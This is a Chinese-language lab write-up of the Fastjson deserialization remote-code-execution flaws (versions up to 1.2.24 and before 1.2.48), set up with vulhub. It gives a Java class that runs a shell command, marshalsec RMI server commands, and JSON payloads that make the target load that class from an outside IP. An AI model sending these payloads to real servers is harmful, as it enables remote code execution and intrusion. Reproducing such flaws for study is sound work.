本篇文章对Fastjson漏洞利用的过程做个简单的记录。
Fastjson是Alibaba开发的,java语言编写的高性能JSON库,采用“假定有序快速匹配”的算法,号称Java语言中最快的JSON库。
其项目地址为https://github.com/alibaba/fastjson,其提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。示例代码:
//序列化
User user = new User("guest",2);
String jsonString = JSON.toJSONString(user)
//反序列化
String jsonString = "{\\"name\\":\\"guest\\",\\"age\\":12}"
User user = (User)JSON.parse(jsonString)
其最近几年爆出的漏洞影响都比较大,下面会进行简单的说明。
20170315第一次爆出的漏洞
2017年3月15日,Alibaba官方发布了一条安全更新:https://github.com/alibaba/fastjson/wiki/security_update_20170315。宣布fastjson<=1.2.24存在远程代码执行高危安全漏洞。
利用原理:
因为fastjson在处理以@type形式传入的类的时候,会默认调用该类的共有setgetis函数,因此我们在寻找利用类的时候思路如下:
1、类的成员变量我们可以控制;
2、想办法在调用类的某个setgetis函数的时候造成命令执行。
于是便找到了JdbcRowSetImpl类,该类在setAutoCommit函数中会对成员变量dataSourceName进行lookup,标准的jndi注入利用。(jndi注入是什么可以看下https://paper.seebug.org/417/)
其利用栈:
Exec:620,Runtime //命令执行
Lookup:417,InitalContext /jndi lookup函数通过rmi或者ldap获取恶意类
setAutoCommit:4067,JdbcRowSetImpl 通过setAutoCommit从而在后面触发了lookup函数
setValue:96,FieldDeserializer //反射调用传入类的set函数
deserialze:600, JavaBeanDeserializer 通过循环调用传入类的共有set,get,is函数
parseObject:368,DefaultJSONParser 解析传入的json字符串
原理大概就那么多,接下来搭建环境复现一下,采用docker(https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce)搭建即可。
Kali 系统: 172.21.137.36
Win10 系统:172.21.137.5
外网系统:173.82.232.183
搭建前提:
搭建过程
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
python3 -m http.server 5555
apt install maven
git clone https://github.com/mbechler/marshalsec.git
mvn clean package -DskipTests
git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE.git
,克隆好后,把里面的marshalsec-0.0.3-SNAPSHOT-all.jar 文件复制到/root/目录下java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://173.82.232.183:5555/#TouchFile" 9999
(这里要注意,前面开启的5555端口和这个9999端口都要同时监听着,开两个终端窗口都连上外网系统就好解决了){
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://173.82.232.183:9999/TouchFile",
"autoCommit":true
}
}
2019年七月份,官方公布了fastjson< 1.2.48 版本存在的rce安全问题,其靶机环境也可以用docker来搭建,都在vulhub的项目中,感兴趣的可以自己搭建试试,两个版本的利用过程仅仅是POST请求包内容不一样而已,这里再附上POST包:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://173.82.232.183:9999/TouchFile",
"autoCommit":true
}
}
最后,关于fastjson漏洞探测和一些版本绕过的POC,可以参考这篇文章底部的第4点:fastjson漏洞复现
PS:这个漏洞探测有个坑,你无法知道对方服务器使用的jdk是什么版本的,所以需要自己从jdk 1.6(Java SE6)、jdk1.7(Java SE7)、jdk1.8(Java SE8)一个个试过来,这目前没什么好办法来判断。(附上JDK下载地址,对应着下载)